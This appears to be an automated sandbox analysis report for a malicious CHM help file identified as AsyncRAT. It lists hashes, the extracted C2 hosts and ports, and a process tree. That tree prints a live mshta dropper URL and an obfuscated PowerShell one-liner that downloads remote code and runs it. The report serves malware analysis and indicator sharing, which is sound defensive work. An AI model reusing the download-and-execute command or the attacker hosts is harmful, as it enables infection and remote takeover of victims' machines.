Overview

overview

10

Static

static

lol.chm

windows7-x64

10

lol.chm

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-10-2022 20:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lol.chm

  • Size

    234KB

  • MD5

    29984ec9b0bef9d92e9a2fec99e9b7d0

  • SHA1

    701cdf5b2419f4da8247e6af9eaa376cdf6e2dc4

  • SHA256

    9ad14a020dc9a937bbe2c2dcd63991e424fe174b96f0131962e24bdd9f823fa3

  • SHA512

    be7703f487bccba2e473411288d1a2919358c49d18355f48aa5d73adb652550c33eeb9ca87dd786dbd46748c64c1af11e40ae6e342ef1b38dbe5fecdb667fe08

  • SSDEEP

    6144:KveS9vg8qKoqjkqNdoYzgOS9vg8qKoqjkqDyoaF73:VSBg8iqjkCKUgOSBg8iqjkWaFT

Score
10/10
asyncrataaaaaaaaaaaa+++aaaaaaaaaaaarat

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://skynetx.com.br/tarefa.html

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

AAAAAAAAAAAA+++AAAAAAAAAAAA

C2

chromedata.accesscam.org:7707

chromedata.accesscam.org:4404

chromedata.accesscam.org:5505

chromedata.accesscam.org:3303

chromedata.accesscam.org:2222

chromedata.accesscam.org:6606

chromedata.accesscam.org:8808

chromedata.accesscam.org:5155

chromedata.accesscam.org:5122

chromedata.accesscam.org:8001

chromedata.accesscam.org:9000

chromedata.accesscam.org:9999

chromedata.accesscam.org:8888

cdt.3utilities.com:7707

cdt.3utilities.com:4404

cdt.3utilities.com:5505

cdt.3utilities.com:3303

cdt.3utilities.com:2222

cdt.3utilities.com:6606

cdt.3utilities.com:8808
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_file

    DesbravadorUpdata.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\lol.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://skynetx.com.br/tarefa.html
      2⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $kaoskdoaksd = [System.NET.WebRequest]::Create('https://msantosm.com.br/logo.png');$ajdiasjdijasd = $kaoskdoaksd.GetResponse();$KASDJASDU = ([System.IO.StreamReader]($ajdiasjdijasd.GetResponseStream())).ReadToEnd()| .('{1}{0}'-f'EX','I')
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
            PID:3664
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            4⤵
              PID:2768

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1904-133-0x0000000000000000-mapping.dmp
        Download
      • memory/2768-138-0x0000000000400000-0x0000000000412000-memory.dmp
        Filesize

        72KB

        Download
      • memory/2768-139-0x000000000040DD7E-mapping.dmp
        Download
      • memory/4584-135-0x0000000000000000-mapping.dmp
        Download
      • memory/4584-136-0x000001F5279B0000-0x000001F5279D2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4584-137-0x000001F50E7C0000-0x000001F50F281000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4584-140-0x000001F50E7C0000-0x000001F50F281000-memory.dmp
        Filesize

        10.8MB

        Download